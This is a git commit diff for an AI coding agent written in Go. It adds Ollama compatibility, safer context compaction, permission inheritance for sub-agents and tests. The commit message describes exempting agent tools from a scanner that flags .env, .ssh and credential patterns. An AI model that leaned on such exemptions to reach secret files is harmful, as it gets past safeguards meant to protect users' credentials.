feat: Ollama/gemma4 compat — /init flow, stream filter, safety fixes

provider/openai:
- Fix doubled tool call args (argsComplete flag): Ollama sends complete
  args in the first streaming chunk then repeats them as delta, causing
  doubled JSON and 400 errors in elfs
- Handle fs: prefix (gemma4 uses fs:grep instead of fs.grep)
- Add Reasoning field support for Ollama thinking output

cmd/gnoma:
- Early TTY detection so logger is created with correct destination
  before any component gets a reference to it (fixes slog WARN bleed
  into TUI textarea)

permission:
- Exempt spawn_elfs and agent tools from safety scanner: elf prompt
  text may legitimately mention .env/.ssh/credentials patterns and
  should not be blocked

tui/app:
- /init retry chain: no-tool-calls → spawn_elfs nudge → write nudge
  (ask for plain text output) → TUI fallback write from streamBuf
- looksLikeAgentsMD + extractMarkdownDoc: validate and clean fallback
  content before writing (reject refusals, strip narrative preambles)
- Collapse thinking output to 3 lines; ctrl+o to expand (live stream
  and committed messages)
- Stream-level filter for model pseudo-tool-call blocks: suppresses
  <<tool_code>>...</tool_code>> and <<function_call>>...<tool_call|>
  from entering streamBuf across chunk boundaries
- sanitizeAssistantText regex covers both block formats
- Reset streamFilterClose at every turn start
This commit is contained in:
2026-04-05 19:24:51 +02:00
parent 14b88cadcc
commit cb2d63d06f
51 changed files with 2855 additions and 353 deletions

View File

@@ -48,14 +48,14 @@ type ProviderSection struct {
Default string `toml:"default"`
Model string `toml:"model"`
MaxTokens int64 `toml:"max_tokens"`
Temperature *float64 `toml:"temperature"`
Temperature *float64 `toml:"temperature"` // TODO(M8): wire to provider.Request.Temperature
APIKeys map[string]string `toml:"api_keys"`
Endpoints map[string]string `toml:"endpoints"`
}
type ToolsSection struct {
BashTimeout Duration `toml:"bash_timeout"`
MaxFileSize int64 `toml:"max_file_size"`
MaxFileSize int64 `toml:"max_file_size"` // TODO(M8): wire to fs tool WithMaxFileSize option
}
// RateLimitSection allows overriding default rate limits per provider.

View File

@@ -119,6 +119,67 @@ func TestApplyEnv_EnvVarReference(t *testing.T) {
}
}
func TestProjectRoot_GoMod(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "pkg", "util")
os.MkdirAll(sub, 0o755)
os.WriteFile(filepath.Join(root, "go.mod"), []byte("module example.com/foo\n"), 0o644)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_Git(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "src")
os.MkdirAll(sub, 0o755)
os.MkdirAll(filepath.Join(root, ".git"), 0o755)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_GnomaDir(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "internal")
os.MkdirAll(sub, 0o755)
os.MkdirAll(filepath.Join(root, ".gnoma"), 0o755)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_Fallback(t *testing.T) {
dir := t.TempDir()
origDir, _ := os.Getwd()
os.Chdir(dir)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != dir {
t.Errorf("ProjectRoot() = %q, want %q (cwd fallback)", got, dir)
}
}
func TestLayeredLoad(t *testing.T) {
// Set up global config
globalDir := t.TempDir()

View File

@@ -55,8 +55,31 @@ func globalConfigPath() string {
return filepath.Join(configDir, "gnoma", "config.toml")
}
// ProjectRoot walks up from cwd to find the nearest directory containing
// a go.mod, .git, or .gnoma directory. Falls back to cwd if none found.
func ProjectRoot() string {
cwd, err := os.Getwd()
if err != nil {
return "."
}
dir := cwd
for {
for _, marker := range []string{"go.mod", ".git", ".gnoma"} {
if _, err := os.Stat(filepath.Join(dir, marker)); err == nil {
return dir
}
}
parent := filepath.Dir(dir)
if parent == dir {
break
}
dir = parent
}
return cwd
}
func projectConfigPath() string {
return filepath.Join(".gnoma", "config.toml")
return filepath.Join(ProjectRoot(), ".gnoma", "config.toml")
}
func applyEnv(cfg *Config) {

View File

@@ -9,6 +9,7 @@ import (
"github.com/BurntSushi/toml"
)
// SetProjectConfig writes a single key=value to the project config file (.gnoma/config.toml).
// Only whitelisted keys are supported.
func SetProjectConfig(key, value string) error {
@@ -21,7 +22,7 @@ func SetProjectConfig(key, value string) error {
return fmt.Errorf("unknown config key %q (supported: %s)", key, strings.Join(allowedKeys(), ", "))
}
path := filepath.Join(".gnoma", "config.toml")
path := projectConfigPath()
// Load existing config or start fresh
var cfg Config

View File

@@ -0,0 +1,34 @@
package context
import "somegit.dev/Owlibou/gnoma/internal/message"
// safeSplitPoint adjusts a compaction split index to avoid orphaning tool
// results. If history[target] is a tool-result message, it walks backward
// until it finds a message that is not a tool result, so the assistant message
// that issued the tool calls stays in the "recent" window alongside its results.
//
// target is the index of the first message to keep in the recent window.
// Returns an adjusted index guaranteed to keep tool-call/tool-result pairs together.
func safeSplitPoint(history []message.Message, target int) int {
if target <= 0 || len(history) == 0 {
return 0
}
if target >= len(history) {
target = len(history) - 1
}
idx := target
for idx > 0 && hasToolResults(history[idx]) {
idx--
}
return idx
}
// hasToolResults reports whether msg contains any ContentToolResult blocks.
func hasToolResults(msg message.Message) bool {
for _, c := range msg.Content {
if c.Type == message.ContentToolResult {
return true
}
}
return false
}

View File

@@ -197,3 +197,215 @@ func (s *failingStrategy) Compact(msgs []message.Message, budget int64) ([]messa
}
var _ Strategy = (*failingStrategy)(nil)
func TestWindow_AppendMessage_NoTokenTracking(t *testing.T) {
w := NewWindow(WindowConfig{MaxTokens: 100_000})
before := w.Tracker().Used()
w.AppendMessage(message.NewUserText("hello"))
after := w.Tracker().Used()
if after != before {
t.Errorf("AppendMessage should not change tracker: before=%d, after=%d", before, after)
}
if len(w.Messages()) != 1 {
t.Errorf("expected 1 message, got %d", len(w.Messages()))
}
}
func TestWindow_CompactionUsesEstimateNotRatio(t *testing.T) {
// Add many small messages then compact to 2.
// The token estimate post-compaction should reflect actual content,
// not a message-count ratio of the previous token count.
w := NewWindow(WindowConfig{
MaxTokens: 200_000,
Strategy: &TruncateStrategy{KeepRecent: 2},
})
// Push 20 messages, each costing 8000 tokens (total: 160K).
// Compaction should leave 2 messages.
for i := 0; i < 10; i++ {
w.Append(message.NewUserText("msg"), message.Usage{InputTokens: 4000})
w.Append(message.NewAssistantText("reply"), message.Usage{OutputTokens: 4000})
}
// Push past critical
w.Tracker().Set(200_000 - DefaultAutocompactBuffer)
compacted, err := w.CompactIfNeeded()
if err != nil {
t.Fatalf("CompactIfNeeded: %v", err)
}
if !compacted {
t.Skip("compaction did not trigger")
}
// After compaction to ~2 messages, EstimateMessages(2 short messages) ~ <100 tokens.
// The old ratio approach would give ~(2/21) * ~(200K-13K) = ~17800 tokens.
// Verify we're well below 17000, indicating the estimate-based approach.
if w.Tracker().Used() >= 17_000 {
t.Errorf("token tracker after compaction seems to use ratio (got %d tokens, expected <17000 for estimate-based)", w.Tracker().Used())
}
}
func TestWindow_AddPrefix_AppendsToPrefix(t *testing.T) {
w := NewWindow(WindowConfig{
MaxTokens: 100_000,
PrefixMessages: []message.Message{message.NewSystemText("initial prefix")},
})
w.AppendMessage(message.NewUserText("hello"))
w.AddPrefix(
message.NewUserText("[Project docs: AGENTS.md]\n\nBuild: make build"),
message.NewAssistantText("Understood."),
)
all := w.AllMessages()
// prefix (1 initial + 2 added) + messages (1)
if len(all) != 4 {
t.Errorf("AllMessages() = %d, want 4", len(all))
}
// The added prefix messages come after the initial prefix, before conversation
if all[1].Role != "user" {
t.Errorf("all[1].Role = %q, want user", all[1].Role)
}
if all[3].Role != "user" {
t.Errorf("all[3].Role = %q, want user (conversation msg)", all[3].Role)
}
}
func TestWindow_AddPrefix_SurvivesReset(t *testing.T) {
w := NewWindow(WindowConfig{MaxTokens: 100_000})
w.AppendMessage(message.NewUserText("hello"))
w.AddPrefix(message.NewSystemText("added prefix"))
w.Reset()
all := w.AllMessages()
// Prefix should survive Reset(), conversation messages cleared
if len(all) != 1 {
t.Errorf("AllMessages() after Reset = %d, want 1 (just added prefix)", len(all))
}
}
func TestWindow_Reset_ClearsMessages(t *testing.T) {
w := NewWindow(WindowConfig{
MaxTokens: 100_000,
PrefixMessages: []message.Message{message.NewSystemText("prefix")},
})
w.AppendMessage(message.NewUserText("hello"))
w.Tracker().Set(5000)
w.Reset()
if len(w.Messages()) != 0 {
t.Errorf("Messages after reset = %d, want 0", len(w.Messages()))
}
if w.Tracker().Used() != 0 {
t.Errorf("Tracker after reset = %d, want 0", w.Tracker().Used())
}
// Prefix should be preserved
if len(w.AllMessages()) != 1 {
t.Errorf("AllMessages after reset should have prefix only, got %d", len(w.AllMessages()))
}
}
// --- Compaction safety (safeSplitPoint) ---
func toolCallMsg() message.Message {
return message.NewAssistantContent(
message.NewToolCallContent(message.ToolCall{
ID: "call-123",
Name: "bash",
}),
)
}
func toolResultMsg() message.Message {
return message.NewToolResults(message.ToolResult{
ToolCallID: "call-123",
Content: "result",
})
}
func TestSafeSplitPoint_NoAdjustmentNeeded(t *testing.T) {
history := []message.Message{
message.NewUserText("hello"), // 0
message.NewAssistantText("hi"), // 1
message.NewUserText("do something"), // 2 — plain user text, safe split point
}
// Target split at index 2: keep history[2:] as recent. Not a tool result.
got := safeSplitPoint(history, 2)
if got != 2 {
t.Errorf("safeSplitPoint = %d, want 2 (no adjustment needed)", got)
}
}
func TestSafeSplitPoint_WalksBackPastToolResult(t *testing.T) {
history := []message.Message{
message.NewUserText("hello"), // 0
message.NewAssistantText("hi"), // 1
toolCallMsg(), // 2 — assistant with tool call
toolResultMsg(), // 3 — tool result (should NOT be split point)
message.NewAssistantText("done"), // 4
}
// Target split at 3 would orphan the tool result (no matching tool call in recent window)
got := safeSplitPoint(history, 3)
if got != 2 {
t.Errorf("safeSplitPoint = %d, want 2 (walk back past tool result to tool call)", got)
}
}
func TestSafeSplitPoint_NeverGoesNegative(t *testing.T) {
// All messages are tool results — should return 0 (not go below 0)
history := []message.Message{
toolResultMsg(),
toolResultMsg(),
}
got := safeSplitPoint(history, 0)
if got != 0 {
t.Errorf("safeSplitPoint = %d, want 0 (floor at 0)", got)
}
}
func TestTruncate_NeverOrphansToolResult(t *testing.T) {
s := NewTruncateStrategy() // keepRecent = 10
s.KeepRecent = 3
// History: user, assistant+toolcall, user+toolresult, assistant, user
// With keepRecent=3, naive split at index 2 would grab [toolresult, assistant, user]
// — orphaning the tool call. safeSplitPoint should walk back to index 1 instead.
history := []message.Message{
message.NewUserText("start"), // 0
toolCallMsg(), // 1 — assistant with tool call
toolResultMsg(), // 2 — must stay paired with index 1
message.NewAssistantText("done"), // 3
message.NewUserText("next"), // 4
}
result, err := s.Compact(history, 100_000)
if err != nil {
t.Fatalf("Compact error: %v", err)
}
// Find the tool result message in result and verify its tool call ID
// appears somewhere in a preceding assistant message
toolCallIDs := make(map[string]bool)
for _, m := range result {
for _, c := range m.Content {
if c.Type == message.ContentToolCall && c.ToolCall != nil {
toolCallIDs[c.ToolCall.ID] = true
}
}
}
for _, m := range result {
for _, c := range m.Content {
if c.Type == message.ContentToolResult && c.ToolResult != nil {
if !toolCallIDs[c.ToolResult.ToolCallID] {
t.Errorf("orphaned tool result: ToolCallID %q has no matching tool call in compacted history",
c.ToolResult.ToolCallID)
}
}
}
}
}

View File

@@ -56,13 +56,16 @@ func (s *SummarizeStrategy) Compact(messages []message.Message, budget int64) ([
return messages, nil
}
// Split: old messages to summarize, recent to keep
// Split: old messages to summarize, recent to keep.
// Adjust split to never orphan tool results — the assistant message with
// matching tool calls must stay in the recent window with its results.
keepRecent := 6
if keepRecent > len(history) {
keepRecent = len(history)
}
oldMessages := history[:len(history)-keepRecent]
recentMessages := history[len(history)-keepRecent:]
splitAt := safeSplitPoint(history, len(history)-keepRecent)
oldMessages := history[:splitAt]
recentMessages := history[splitAt:]
// Build conversation text for summarization
var convText strings.Builder

View File

@@ -46,7 +46,10 @@ func (s *TruncateStrategy) Compact(messages []message.Message, budget int64) ([]
marker := message.NewUserText("[Earlier conversation was summarized to save context]")
ack := message.NewAssistantText("Understood, I'll continue from here.")
recent := history[len(history)-keepRecent:]
// Adjust split to never orphan tool results (the assistant message with
// matching tool calls must stay in the recent window with its results).
splitAt := safeSplitPoint(history, len(history)-keepRecent)
recent := history[splitAt:]
result := append(systemMsgs, marker, ack)
result = append(result, recent...)
return result, nil

View File

@@ -57,12 +57,20 @@ func NewWindow(cfg WindowConfig) *Window {
}
}
// Append adds a message and tracks usage.
// Append adds a message and tracks usage (legacy: accumulates InputTokens+OutputTokens).
// Prefer AppendMessage + Tracker().Set() for accurate per-round tracking.
func (w *Window) Append(msg message.Message, usage message.Usage) {
w.messages = append(w.messages, msg)
w.tracker.Add(usage)
}
// AppendMessage adds a message without touching the token tracker.
// Use this for user messages, tool results, and injected context — callers
// are responsible for updating the tracker separately (e.g., via Tracker().Set).
func (w *Window) AppendMessage(msg message.Message) {
w.messages = append(w.messages, msg)
}
// Messages returns the mutable conversation history (without prefix).
func (w *Window) Messages() []message.Message {
return w.messages
@@ -162,8 +170,9 @@ func (w *Window) doCompact(force bool) (bool, error) {
originalLen := len(w.messages)
w.messages = compacted
ratio := float64(len(compacted)) / float64(originalLen+1)
w.tracker.Set(int64(float64(w.tracker.Used()) * ratio))
// Re-estimate tokens from actual message content rather than using a
// message-count ratio (which is unrelated to token count).
w.tracker.Set(EstimateMessages(compacted))
w.logger.Info("compaction complete",
"messages_before", originalLen,
@@ -179,6 +188,12 @@ func (w *Window) doCompact(force bool) (bool, error) {
return true, nil
}
// AddPrefix appends messages to the immutable prefix.
// Used to hot-load project docs (e.g., after /init generates AGENTS.md).
func (w *Window) AddPrefix(msgs ...message.Message) {
w.prefix = append(w.prefix, msgs...)
}
// Reset clears all messages and usage (prefix is preserved).
func (w *Window) Reset() {
w.messages = nil

View File

@@ -3,6 +3,7 @@ package elf
import (
"context"
"fmt"
"sync"
"sync/atomic"
"time"
@@ -73,13 +74,16 @@ func nextID(prefix string) string {
// BackgroundElf runs on its own goroutine with an independent engine.
type BackgroundElf struct {
id string
eng *engine.Engine
events chan stream.Event
result chan Result
cancel context.CancelFunc
status atomic.Int32
startAt time.Time
id string
eng *engine.Engine
events chan stream.Event
result chan Result
cancel context.CancelFunc
status atomic.Int32
startAt time.Time
cachedResult Result
resultOnce sync.Once
eventsClose sync.Once
}
// SpawnBackground creates and starts a background elf.
@@ -102,6 +106,22 @@ func SpawnBackground(eng *engine.Engine, prompt string) *BackgroundElf {
}
func (e *BackgroundElf) run(ctx context.Context, prompt string) {
closeEvents := func() { e.eventsClose.Do(func() { close(e.events) }) }
defer func() {
if r := recover(); r != nil {
closeEvents()
res := Result{
ID: e.id,
Status: StatusFailed,
Error: fmt.Errorf("elf panicked: %v", r),
Duration: time.Since(e.startAt),
}
e.status.Store(int32(StatusFailed))
e.result <- res
}
}()
cb := func(evt stream.Event) {
select {
case e.events <- evt:
@@ -111,7 +131,7 @@ func (e *BackgroundElf) run(ctx context.Context, prompt string) {
turn, err := e.eng.Submit(ctx, prompt, cb)
close(e.events)
closeEvents()
r := Result{
ID: e.id,
@@ -149,5 +169,8 @@ func (e *BackgroundElf) Events() <-chan stream.Event { return e.events }
func (e *BackgroundElf) Cancel() { e.cancel() }
func (e *BackgroundElf) Wait() Result {
return <-e.result
e.resultOnce.Do(func() {
e.cachedResult = <-e.result
})
return e.cachedResult
}

View File

@@ -222,6 +222,94 @@ func TestManager_WaitAll(t *testing.T) {
}
}
func TestBackgroundElf_WaitIdempotent(t *testing.T) {
mp := &mockProvider{
name: "test",
streams: []stream.Stream{newEventStream("hello")},
}
eng, _ := engine.New(engine.Config{Provider: mp, Tools: tool.NewRegistry()})
elf := SpawnBackground(eng, "do something")
r1 := elf.Wait()
r2 := elf.Wait() // must not deadlock
if r1.Status != r2.Status {
t.Errorf("Wait() returned different statuses: %s vs %s", r1.Status, r2.Status)
}
if r1.Output != r2.Output {
t.Errorf("Wait() returned different outputs: %q vs %q", r1.Output, r2.Output)
}
}
func TestBackgroundElf_PanicRecovery(t *testing.T) {
// A provider that panics on Stream() — simulates an engine crash
panicProvider := &panicOnStreamProvider{}
eng, _ := engine.New(engine.Config{Provider: panicProvider, Tools: tool.NewRegistry()})
elf := SpawnBackground(eng, "do something")
result := elf.Wait() // must not hang
if result.Status != StatusFailed {
t.Errorf("status = %s, want failed", result.Status)
}
if result.Error == nil {
t.Error("error should be non-nil after panic recovery")
}
}
type panicOnStreamProvider struct{}
func (p *panicOnStreamProvider) Name() string { return "panic" }
func (p *panicOnStreamProvider) DefaultModel() string { return "panic" }
func (p *panicOnStreamProvider) Models(_ context.Context) ([]provider.ModelInfo, error) {
return nil, nil
}
func (p *panicOnStreamProvider) Stream(_ context.Context, _ provider.Request) (stream.Stream, error) {
panic("intentional test panic")
}
func TestManager_CleanupRemovesMeta(t *testing.T) {
mp := &mockProvider{
name: "test",
streams: []stream.Stream{newEventStream("result")},
}
rtr := router.New(router.Config{})
rtr.RegisterArm(&router.Arm{
ID: "test/mock", Provider: mp, ModelName: "mock",
Capabilities: provider.Capabilities{ToolUse: true},
})
mgr := NewManager(ManagerConfig{Router: rtr, Tools: tool.NewRegistry()})
e, _ := mgr.Spawn(context.Background(), router.TaskGeneration, "task", "", 30)
e.Wait()
// Before cleanup: elf and meta both present
mgr.mu.RLock()
_, elfExists := mgr.elfs[e.ID()]
_, metaExists := mgr.meta[e.ID()]
mgr.mu.RUnlock()
if !elfExists || !metaExists {
t.Fatal("elf and meta should exist before cleanup")
}
mgr.Cleanup()
// After cleanup: both removed
mgr.mu.RLock()
_, elfExists = mgr.elfs[e.ID()]
_, metaExists = mgr.meta[e.ID()]
mgr.mu.RUnlock()
if elfExists {
t.Error("elf should be removed after cleanup")
}
if metaExists {
t.Error("meta should be removed after cleanup (was leaking)")
}
}
// slowEventStream blocks until context cancelled
type slowEventStream struct {
done bool

View File

@@ -7,31 +7,38 @@ import (
"sync"
"somegit.dev/Owlibou/gnoma/internal/engine"
"somegit.dev/Owlibou/gnoma/internal/permission"
"somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/router"
"somegit.dev/Owlibou/gnoma/internal/security"
"somegit.dev/Owlibou/gnoma/internal/tool"
)
// elfMeta tracks routing metadata for quality feedback.
// elfMeta tracks routing metadata and pool reservations for quality feedback.
type elfMeta struct {
armID router.ArmID
taskType router.TaskType
decision router.RoutingDecision // holds pool reservations until elf completes
}
// Manager spawns, tracks, and manages elfs.
type Manager struct {
mu sync.RWMutex
elfs map[string]Elf
meta map[string]elfMeta // routing metadata per elf ID
router *router.Router
tools *tool.Registry
logger *slog.Logger
mu sync.RWMutex
elfs map[string]Elf
meta map[string]elfMeta // routing metadata per elf ID
router *router.Router
tools *tool.Registry
permissions *permission.Checker
firewall *security.Firewall
logger *slog.Logger
}
type ManagerConfig struct {
Router *router.Router
Tools *tool.Registry
Logger *slog.Logger
Router *router.Router
Tools *tool.Registry
Permissions *permission.Checker // nil = allow all (unsafe; prefer passing parent checker)
Firewall *security.Firewall // nil = no scanning
Logger *slog.Logger
}
func NewManager(cfg ManagerConfig) *Manager {
@@ -40,11 +47,13 @@ func NewManager(cfg ManagerConfig) *Manager {
logger = slog.Default()
}
return &Manager{
elfs: make(map[string]Elf),
meta: make(map[string]elfMeta),
router: cfg.Router,
tools: cfg.Tools,
logger: logger,
elfs: make(map[string]Elf),
meta: make(map[string]elfMeta),
router: cfg.Router,
tools: cfg.Tools,
permissions: cfg.Permissions,
firewall: cfg.Firewall,
logger: logger,
}
}
@@ -71,16 +80,26 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
"model", arm.ModelName,
)
// Resolve permissions for this elf: inherit parent mode but never prompt
// (no TUI in elf context — prompting would deadlock).
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
// Create independent engine for the elf
eng, err := engine.New(engine.Config{
Provider: arm.Provider,
Tools: m.tools,
System: systemPrompt,
Model: arm.ModelName,
MaxTurns: maxTurns,
Logger: m.logger,
Provider: arm.Provider,
Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt,
Model: arm.ModelName,
MaxTurns: maxTurns,
Logger: m.logger,
})
if err != nil {
decision.Rollback()
return nil, fmt.Errorf("create elf engine: %w", err)
}
@@ -88,14 +107,14 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
m.mu.Lock()
m.elfs[elf.ID()] = elf
m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType}
m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType, decision: decision}
m.mu.Unlock()
m.logger.Info("elf spawned", "id", elf.ID(), "arm", arm.ID)
return elf, nil
}
// ReportResult reports an elf's outcome to the router for quality feedback.
// ReportResult commits pool reservations and reports an elf's outcome to the router.
func (m *Manager) ReportResult(result Result) {
m.mu.RLock()
meta, ok := m.meta[result.ID]
@@ -105,6 +124,11 @@ func (m *Manager) ReportResult(result Result) {
return
}
// Commit pool reservations with actual token consumption.
// Cancelled/failed elfs still commit what they consumed; a zero commit is
// safe — it just moves reserved tokens to used at rate 0.
meta.decision.Commit(int(result.Usage.TotalTokens()))
m.router.ReportOutcome(router.Outcome{
ArmID: meta.armID,
TaskType: meta.taskType,
@@ -116,13 +140,19 @@ func (m *Manager) ReportResult(result Result) {
// SpawnWithProvider creates an elf using a specific provider (bypasses router).
func (m *Manager) SpawnWithProvider(prov provider.Provider, model, prompt, systemPrompt string, maxTurns int) (Elf, error) {
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
eng, err := engine.New(engine.Config{
Provider: prov,
Tools: m.tools,
System: systemPrompt,
Model: model,
MaxTurns: maxTurns,
Logger: m.logger,
Provider: prov,
Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt,
Model: model,
MaxTurns: maxTurns,
Logger: m.logger,
})
if err != nil {
return nil, fmt.Errorf("create elf engine: %w", err)
@@ -207,6 +237,7 @@ func (m *Manager) Cleanup() {
s := e.Status()
if s == StatusCompleted || s == StatusFailed || s == StatusCancelled {
delete(m.elfs, id)
delete(m.meta, id)
}
}
}

View File

@@ -45,6 +45,11 @@ type Turn struct {
Rounds int // number of API round-trips
}
// TurnOptions carries per-turn overrides that apply for a single Submit call.
type TurnOptions struct {
ToolChoice provider.ToolChoiceMode // "" = use provider default
}
// Engine orchestrates the conversation.
type Engine struct {
cfg Config
@@ -59,6 +64,9 @@ type Engine struct {
// Deferred tool loading: tools with ShouldDefer() are excluded until
// the model requests them. Activated on first use.
activatedTools map[string]bool
// Per-turn options, set for the duration of SubmitWithOptions.
turnOpts TurnOptions
}
// New creates an engine.
@@ -124,6 +132,9 @@ func (e *Engine) ContextWindow() *gnomactx.Window {
// the model should see as context in subsequent turns.
func (e *Engine) InjectMessage(msg message.Message) {
e.history = append(e.history, msg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(msg)
}
}
// Usage returns cumulative token usage.
@@ -145,4 +156,8 @@ func (e *Engine) SetModel(model string) {
func (e *Engine) Reset() {
e.history = nil
e.usage = message.Usage{}
if e.cfg.Context != nil {
e.cfg.Context.Reset()
}
e.activatedTools = make(map[string]bool)
}

View File

@@ -7,6 +7,7 @@ import (
"fmt"
"testing"
gnomactx "somegit.dev/Owlibou/gnoma/internal/context"
"somegit.dev/Owlibou/gnoma/internal/message"
"somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/stream"
@@ -446,6 +447,109 @@ func TestEngine_Reset(t *testing.T) {
}
}
func TestEngine_Reset_ClearsContextWindow(t *testing.T) {
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopEndTurn, "",
stream.Event{Type: stream.EventTextDelta, Text: "hi"},
),
},
}
e, _ := New(Config{
Provider: mp,
Tools: tool.NewRegistry(),
Context: ctxWindow,
})
e.Submit(context.Background(), "hello", nil)
if len(ctxWindow.Messages()) == 0 {
t.Fatal("context window should have messages before reset")
}
e.Reset()
if len(ctxWindow.Messages()) != 0 {
t.Errorf("context window should be empty after reset, got %d messages", len(ctxWindow.Messages()))
}
}
func TestSubmit_ContextWindowTracksUserAndToolMessages(t *testing.T) {
reg := tool.NewRegistry()
reg.Register(&mockTool{
name: "bash",
execFn: func(_ context.Context, _ json.RawMessage) (tool.Result, error) {
return tool.Result{Output: "output"}, nil
},
})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopToolUse, "model",
stream.Event{Type: stream.EventToolCallStart, ToolCallID: "tc1", ToolCallName: "bash"},
stream.Event{Type: stream.EventToolCallDone, ToolCallID: "tc1", Args: json.RawMessage(`{"command":"ls"}`)},
stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 20}},
),
newEventStream(message.StopEndTurn, "model",
stream.Event{Type: stream.EventTextDelta, Text: "Done."},
),
},
}
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
e, _ := New(Config{
Provider: mp,
Tools: reg,
Context: ctxWindow,
})
_, err := e.Submit(context.Background(), "list files", nil)
if err != nil {
t.Fatalf("Submit: %v", err)
}
allMsgs := ctxWindow.AllMessages()
// Expect: user msg, assistant (tool call), tool results, assistant (final)
if len(allMsgs) < 4 {
t.Errorf("context window has %d messages, want at least 4 (user+assistant+tool_results+assistant)", len(allMsgs))
for i, m := range allMsgs {
t.Logf(" [%d] role=%s content=%s", i, m.Role, m.TextContent())
}
}
// First message should be user
if len(allMsgs) > 0 && allMsgs[0].Role != message.RoleUser {
t.Errorf("allMsgs[0].Role = %q, want user", allMsgs[0].Role)
}
}
func TestSubmit_TrackerReflectsInputTokens(t *testing.T) {
// Verify the tracker is set from InputTokens (not accumulated).
// After 3 rounds, tracker should equal last round's InputTokens+OutputTokens,
// not the sum of all rounds.
ctxWindow := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
mp := &mockProvider{
name: "test",
streams: []stream.Stream{
newEventStream(message.StopEndTurn, "",
stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 50}},
stream.Event{Type: stream.EventTextDelta, Text: "a"},
),
},
}
e, _ := New(Config{Provider: mp, Tools: tool.NewRegistry(), Context: ctxWindow})
e.Submit(context.Background(), "hi", nil)
// Tracker should be InputTokens + OutputTokens = 150, not more
used := ctxWindow.Tracker().Used()
if used != 150 {
t.Errorf("tracker = %d, want 150 (InputTokens+OutputTokens, not cumulative)", used)
}
}
func TestSubmit_CumulativeUsage(t *testing.T) {
mp := &mockProvider{
name: "test",

View File

@@ -2,7 +2,6 @@ package engine
import (
"context"
"encoding/json"
"errors"
"fmt"
"sync"
@@ -20,8 +19,19 @@ import (
// Submit sends a user message and runs the agentic loop to completion.
// The callback receives real-time streaming events.
func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn, error) {
return e.SubmitWithOptions(ctx, input, TurnOptions{}, cb)
}
// SubmitWithOptions is like Submit but applies per-turn overrides (e.g. ToolChoice).
func (e *Engine) SubmitWithOptions(ctx context.Context, input string, opts TurnOptions, cb Callback) (*Turn, error) {
e.turnOpts = opts
defer func() { e.turnOpts = TurnOptions{} }()
userMsg := message.NewUserText(input)
e.history = append(e.history, userMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(userMsg)
}
return e.runLoop(ctx, cb)
}
@@ -29,6 +39,11 @@ func (e *Engine) Submit(ctx context.Context, input string, cb Callback) (*Turn,
// SubmitMessages is like Submit but accepts pre-built messages.
func (e *Engine) SubmitMessages(ctx context.Context, msgs []message.Message, cb Callback) (*Turn, error) {
e.history = append(e.history, msgs...)
if e.cfg.Context != nil {
for _, m := range msgs {
e.cfg.Context.AppendMessage(m)
}
}
return e.runLoop(ctx, cb)
}
@@ -48,6 +63,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Route and stream
var s stream.Stream
var err error
var decision router.RoutingDecision
if e.cfg.Router != nil {
// Classify task from the latest user message
@@ -59,7 +75,7 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000 // rough default
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
e.logger.Debug("routing request",
"task_type", task.Type,
@@ -67,13 +83,12 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
"round", turn.Rounds,
)
var arm *router.Arm
s, arm, err = e.cfg.Router.Stream(ctx, task, req)
if arm != nil {
s, decision, err = e.cfg.Router.Stream(ctx, task, req)
if decision.Arm != nil {
e.logger.Debug("streaming request",
"provider", arm.Provider.Name(),
"model", arm.ModelName,
"arm", arm.ID,
"provider", decision.Arm.Provider.Name(),
"model", decision.Arm.ModelName,
"arm", decision.Arm.ID,
"messages", len(req.Messages),
"tools", len(req.Tools),
"round", turn.Rounds,
@@ -101,9 +116,11 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000
s, _, retryErr := e.cfg.Router.Stream(ctx, task, req)
return s, retryErr
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
var retryDecision router.RoutingDecision
s, retryDecision, err = e.cfg.Router.Stream(ctx, task, req)
